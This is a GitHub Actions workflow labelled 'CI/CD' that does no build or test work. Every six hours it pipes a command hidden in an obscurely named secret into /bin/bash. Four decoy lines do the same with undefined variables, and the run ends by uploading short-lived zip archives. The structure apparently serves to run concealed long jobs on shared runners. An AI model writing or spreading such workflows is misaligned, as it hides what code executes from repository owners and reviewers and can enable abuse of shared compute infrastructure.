name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '58 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          upti13903: ${{ secrets.upti13903 }}
        run: |
          printf '%s' "$upti13903" | jq -r .slk00739 | /bin/bash
          printf '%s' "$l332" | jq -r .f92 | /bin/bash
          echo $gpvvh03 | jq -r .pcadv682 | /bin/bash
          printf '%s' "$bhwoo8227" | jq -r .rl79 | /bin/bash
          printf '%s' "$sya77094" | jq -r .rplqu7407 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: NSvysdk2
          path: "*.zip"
          retention-days: 1
